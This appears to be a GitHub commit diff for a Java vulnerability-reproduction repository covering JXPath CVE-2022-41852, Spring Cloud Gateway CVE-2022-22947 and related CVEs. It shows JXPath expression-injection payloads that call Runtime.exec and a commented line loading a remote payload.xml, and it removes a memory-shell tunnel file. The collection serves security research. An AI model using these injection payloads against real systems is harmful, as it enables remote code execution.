Whoopsunix
diff --git a/‎README.md
+3 b/‎README.md
+3
diff --git a/‎components/Apache Commons JXPath/CVE-2022-41852/poc/CVE-2022-41852Art.md renamed to ‎components/Apache Commons JXPath/CVE-2022-41852/poc/CVE-2022-41852.md
+1-1 b/‎components/Apache Commons JXPath/CVE-2022-41852/poc/CVE-2022-41852Art.md renamed to ‎components/Apache Commons JXPath/CVE-2022-41852/poc/CVE-2022-41852.md
+1-1
diff --git a/‎components/Apache Commons JXPath/CVE-2022-41852/src/main/java/com/example/jxpathdemo/RceDemo.java
+2-1 b/‎components/Apache Commons JXPath/CVE-2022-41852/src/main/java/com/example/jxpathdemo/RceDemo.java
+2-1
diff --git a/‎components/Spring Cloud/CVE-2022-22947/poc/CVE-2022-22947Art.md renamed to ‎components/Spring Cloud/CVE-2022-22947/poc/CVE-2022-22947.md b/‎components/Spring Cloud/CVE-2022-22947/poc/CVE-2022-22947Art.md renamed to ‎components/Spring Cloud/CVE-2022-22947/poc/CVE-2022-22947.md
diff --git a/‎components/Spring Cloud/CVE-2022-22947/src/main/java/com/example/cve_2022_22947/CBController.java
-42 b/‎components/Spring Cloud/CVE-2022-22947/src/main/java/com/example/cve_2022_22947/CBController.java
-42
diff --git a/‎components/Spring Cloud/CVE-2022-22947/src/main/java/com/example/cve_2022_22947/MemNeoregeorg.java
-224 b/‎components/Spring Cloud/CVE-2022-22947/src/main/java/com/example/cve_2022_22947/MemNeoregeorg.java
-224
@@ -44,9 +44,12 @@ By. Whoopsunix
     - [CVE-2022-22980 Spring Data MongoDB SpEL表达式注入](components/Spring%20Data%20MongoDB/CVE-2022-22980)
 - Spring Cloud
     - [CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL表达式注入](components/Spring%20Cloud/CVE-2022-22947)
+    - [CVE-2022-22963 Spring Cloud Function functionRouter SPEL代码执行漏洞](components/Spring%20Cloud/CVE-2022-22963)
 - [SpringBootVulExploit by LandGrey](https://github.com/LandGrey/SpringBootVulExploit)
 - spring-messaging
     - [CVE-2018-1270 & CVE-2018-1275 Spring spring-messaging 远程命令执行漏洞](components/spring-messaging/CVE-2018-1270)
+- spring-commons
+    - [CVE-2018-1273 Spring Data Commons 远程代码执行漏洞](components/Spring%20Data%20Commons/CVE-2018-1273)
 - [ff4j](components/ff4j)
 - [XStream 系列](components/XStreamDemo)
 - structs2
 
@@ -60,7 +60,7 @@ String firstName = (String)context.getValue("getAuthorsFirstName($book)");
 
 ```java
 jxPathContext.getValue("exec(java.lang.Runtime.getRuntime(),'open -a Calculator')");
-       jxPathContext.getValue("eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'java.lang.Runtime.getRuntime().exec(\"open -a Calculator\")')");
+jxPathContext.getValue("eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'java.lang.Runtime.getRuntime().exec(\"open -a Calculator\")')");
 ```
 
 
 
@@ -12,7 +12,8 @@ public static class User {
 
     }
 
-    public static void main(String[] args) {
+    public static void main(String[] args) throws InterruptedException {
+        Thread.sleep(5);
         JXPathContext jxPathContext = JXPathContext.newContext(new User());
 //        Object object = jxPathContext.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:1234/payload.xml\")");
         jxPathContext.getValue("exec(java.lang.Runtime.getRuntime(),'open -a Calculator')");
Original file line number	Diff line number	Diff line change
`@@ -12,7 +12,8 @@ public static class User {`
`12`	`12`
`13`	`13`	`}`
`14`	`14`
`15`		`- public static void main(String[] args) {`
	`15`	`+ public static void main(String[] args) throws InterruptedException {`
	`16`	`+ Thread.sleep(5);`
`16`	`17`	`JXPathContext jxPathContext = JXPathContext.newContext(new User());`
`17`	`18`	`// Object object = jxPathContext.getValue("org.springframework.context.support.ClassPathXmlApplicationContext.new(\"http://127.0.0.1:1234/payload.xml\")");`
`18`	`19`	`jxPathContext.getValue("exec(java.lang.Runtime.getRuntime(),'open -a Calculator')");`